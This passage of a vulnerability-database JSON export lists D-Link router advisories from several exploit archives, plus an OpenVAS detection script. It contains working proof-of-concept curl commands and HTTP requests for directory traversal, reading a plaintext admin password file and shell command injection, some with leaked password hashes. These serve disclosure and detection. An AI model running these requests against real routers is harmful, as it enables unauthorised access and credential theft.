vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link Routers - Plaintext Password", "edition": 1, "published": "2018-10-12T00:00:00", "title": "D-Link Routers - Plaintext Password", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824", "CVE-2018-10822"], "modified": "2018-10-12T00:00:00", "id": "EXPLOITPACK:99C55C552E76F7F5F22B613B84A71628", "href": "", "sourceData": "## Password stored in plaintext\nCVE: CVE-2018-10824\n\nDescription:\n\nAn issue was discovered on D-Link routers:\n\nDWR-116 through 1.06,\nDIR-140L through 1.02,\nDIR-640L through 1.02,\nDWR-512 through 2.02,\nDWR-712 through 2.02,\nDWR-912 through 2.02,\nDWR-921 through 2.02,\nDWR-111 through 1.01,\nand probably others with the same type of firmware.\nNOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple\n\nThe administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.\n\nPoC using the directory traversal vulnerability disclosed above - CVE-2018-10822\n\n`$ curl http://routerip/uir//tmp/XXX/0`\nThis command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link Routers - Command Injection", "edition": 1, "published": "2018-10-12T00:00:00", "title": "D-Link Routers - Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823"], "modified": "2018-10-12T00:00:00", "id": "EXPLOITPACK:74666E227460F5E33300C7E86CA29F21", "href": "", "sourceData": "## Shell command injection\nCVE: CVE-2018-10823\n\nCVSS v3: 9.1\nAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n\nDescription: An issue was discovered on D-Link routers:\n\nDWR-116 through 1.06,\nDWR-512 through 2.02,\nDWR-712 through 2.02,\nDWR-912 through 2.02,\nDWR-921 through 2.02,\nDWR-111 through 1.01,\nand probably others with the same type of firmware.\nAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n\nPoC:\n\nLogin to the router.\nRequest the following URL after login:\n`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`\nSee the passwd file contents in the response.", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link DWR-116 DWR-116A1 - Arbitrary File Download", "edition": 1, "published": "2017-04-07T00:00:00", "title": "D-Link DWR-116 DWR-116A1 - Arbitrary File Download", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6190"], "modified": "2017-04-07T00:00:00", "id": "EXPLOITPACK:8AB3A02A28DDB5D882D234C411704FB7", "href": "", "sourceData": "# Title: D-Link DWR-116 Arbitrary File Download\n# Vendor: D-Link (www.dlink.com)\n# Affected model(s): DWR-116 / DWR-116A1\n# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)\n# CVE: CVE-2017-6190\n# Date: 04.07.2016\n# Author: Patryk Bogdan (@patryk_bogdan)\n\nDescription:\nD-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability\nwhich leads to unathorized file download from device filesystem.\n\n\nPoC:\n\nHTTP Request:\nGET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1\nHost: 192.168.2.1\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\n\nHTTP Response:\nHTTP/1.0 200 OK\nContent-Type: application/x-none\nCache-Control: max-age=60\nConnection: close\n\nroot:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash\nnobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin\nftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin\n\n\nFix:\nUpdate device to the new firmware (V1.05b09)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-05-12T16:30:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6190"], "description": "The host is a D-Link (DWR) device\n and is prone to a directory traversal vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2018-11-26T00:00:00", "id": "OPENVAS:1361412562310108486", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108486", "type": "openvas", "title": "D-Link DWR Devices 'CVE-2017-6190' Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# D-Link DWR Devices 'CVE-2017-6190' Directory Traversal Vulnerability\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE_PREFIX = \"cpe:/o:d-link\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108486\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2017-6190\");\n script_bugtraq_id(97620);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-26 13:53:11 +0100 (Mon, 26 Nov 2018)\");\n script_name(\"D-Link DWR Devices 'CVE-2017-6190' Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dlink_dsl_detect.nasl\", \"gb_dlink_dap_detect.nasl\", \"gb_dlink_dir_detect.nasl\", \"gb_dlink_dwr_detect.nasl\");\n script_mandatory_keys(\"Host/is_dlink_device\"); # nb: Experiences in the past have shown that various different devices might be affected\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/41840/\");\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/97620\");\n script_xref(name:\"URL\", value:\"https://cxsecurity.com/blad/WLB-2017040033\");\n\n script_tag(name:\"summary\", value:\"The host is a D-Link (DWR) device\n and is prone to a directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request\n and check whether it is possible to read a file on the filesystem.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files on the target system.\");\n\n script_tag(name:\"affected\", value:\"D-Link DWR-116 devices with firmware version\n before V1.05b09. Other devices, models or versions might be also affected.\");\n\n script_tag(name:\"solution\", value:\"Update to firmware version V1.05b09 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! infos = get_app_port_from_cpe_prefix( cpe:CPE_PREFIX, service:\"www\" ) )\n exit( 0 );\n\nport = infos[\"port\"];\nCPE = infos[\"cpe\"];\n\nfiles = traversal_files( \"linux\" );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n url = dir + \"/uir/\" + crap( data:\"../\", length:3*16 ) + file;\n\n if( http_vuln_check( port:port, url:url, pattern:pattern, check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-10-25T14:44:30", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-10-25T00:00:00", "title": "D-Link Routers - Directory Traversal Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10822"], "modified": "2018-10-25T00:00:00", "id": "1337DAY-ID-31401", "href": "https://0day.today/exploit/description/31401", "sourceData": "Directory Traversal\r\nCVE: CVE-2018-10822\r\n \r\nCVSS v3: 8.6\r\nAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\r\n \r\nDescription: Directory traversal vulnerability in the web interface on D-Link routers:\r\n \r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware\r\nallows remote attackers to read arbitrary files via a /.. or // after \u201cGET /uir\u201d in an HTTP request.\r\n \r\nNOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.\r\n \r\nPoC:\r\n \r\n`$ curl http://routerip/uir//etc/passwd`\r\nThe vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.\r\n \r\nThis vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.\n\n# 0day.today [2018-10-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31401"}, {"lastseen": "2018-10-25T14:44:47", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-10-25T00:00:00", "title": "D-Link Routers - Plaintext Password Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824"], "modified": "2018-10-25T00:00:00", "id": "1337DAY-ID-31400", "href": "https://0day.today/exploit/description/31400", "sourceData": "## Password stored in plaintext\r\nCVE: CVE-2018-10824\r\n \r\nDescription:\r\n \r\nAn issue was discovered on D-Link routers:\r\n \r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nNOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple\r\n \r\nThe administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.\r\n \r\nPoC using the directory traversal vulnerability disclosed above - CVE-2018-10822\r\n \r\n`$ curl http://routerip/uir//tmp/XXX/0`\r\nThis command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.\n\n# 0day.today [2018-10-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31400"}, {"lastseen": "2018-10-25T14:46:05", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-10-25T00:00:00", "title": "D-Link Routers - Command Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823"], "modified": "2018-10-25T00:00:00", "id": "1337DAY-ID-31402", "href": "https://0day.today/exploit/description/31402", "sourceData": "## Shell command injection\r\nCVE: CVE-2018-10823\r\n \r\nCVSS v3: 9.1\r\nAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\r\n \r\nDescription: An issue was discovered on D-Link routers:\r\n \r\nDWR-116 through 1.06,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\r\n \r\nPoC:\r\n \r\nLogin to the router.\r\nRequest the following URL after login:\r\n`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`\r\nSee the passwd file contents in the response.\n\n# 0day.today [2018-10-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31402"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:36", "description": "", "published": "2018-10-12T00:00:00", "type": "exploitdb", "title": "D-Link Routers - Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10822"], "modified": "2018-10-12T00:00:00", "id": "EDB-ID:45678", "href": "https://www.exploit-db.com/exploits/45678", "sourceData": "Directory Traversal\r\nCVE: CVE-2018-10822\r\n\r\nCVSS v3: 8.6\r\nAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\r\n\r\nDescription: Directory traversal vulnerability in the web interface on D-Link routers:\r\n\r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware\r\nallows remote attackers to read arbitrary files via a /.. or // after \u201cGET /uir\u201d in an HTTP request.\r\n\r\nNOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.\r\n\r\nPoC:\r\n\r\n`$ curl http://routerip/uir//etc/passwd`\r\nThe vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.\r\n\r\nThis vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45678"}, {"lastseen": "2018-11-30T12:31:36", "description": "", "published": "2018-10-12T00:00:00", "type": "exploitdb", "title": "D-Link Routers - Plaintext Password", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824"], "modified": "2018-10-12T00:00:00", "id": "EDB-ID:45677", "href": "https://www.exploit-db.com/exploits/45677", "sourceData": "## Password stored in plaintext\r\nCVE: CVE-2018-10824\r\n\r\nDescription:\r\n\r\nAn issue was discovered on D-Link routers:\r\n\r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nNOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple\r\n\r\nThe administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.\r\n\r\nPoC using the directory traversal vulnerability disclosed above - CVE-2018-10822\r\n\r\n`$ curl http://routerip/uir//tmp/XXX/0`\r\nThis command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45677"}, {"lastseen": "2018-11-30T12:31:36", "description": "", "published": "2018-10-12T00:00:00", "type": "exploitdb", "title": "D-Link Routers - Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823"], "modified": "2018-10-12T00:00:00", "id": "EDB-ID:45676", "href": "https://www.exploit-db.com/exploits/45676", "sourceData": "## Shell command injection\r\nCVE: CVE-2018-10823\r\n\r\nCVSS v3: 9.1\r\nAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\r\n\r\nDescription: An issue was discovered on D-Link routers:\r\n\r\nDWR-116 through 1.06,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\r\n\r\nPoC:\r\n\r\nLogin to the router.\r\nRequest the following URL after login:\r\n`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`\r\nSee the passwd file contents in the response.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45676"}, {"lastseen": "2018-11-30T12:32:48", "description": "", "published": "2017-04-07T00:00:00", "type": "exploitdb", "title": "D-Link DWR-116 / DWR-116A1 - Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6190"], "modified": "2017-04-07T00:00:00", "id": "EDB-ID:41840", "href": "https://www.exploit-db.com/exploits/41840", "sourceData": "# Title: D-Link DWR-116 Arbitrary File Download\r\n# Vendor: D-Link (www.dlink.com)\r\n# Affected model(s): DWR-116 / DWR-116A1\r\n# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)\r\n# CVE: CVE-2017-6190\r\n# Date: 04.07.2016\r\n# Author: Patryk Bogdan (@patryk_bogdan)\r\n\r\nDescription:\r\nD-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability\r\nwhich leads to unathorized file download from device filesystem.\r\n\r\n\r\nPoC:\r\n\r\nHTTP Request:\r\nGET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1\r\nHost: 192.168.2.1\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nConnection: close\r\n\r\nHTTP Response:\r\nHTTP/1.0 200 OK\r\nContent-Type: application/x-none\r\nCache-Control: max-age=60\r\nConnection: close\r\n\r\nroot:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash\r\nnobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin\r\nftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin\r\n\r\n\r\nFix:\r\nUpdate device to the new firmware (V1.05b09)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/41840"}]}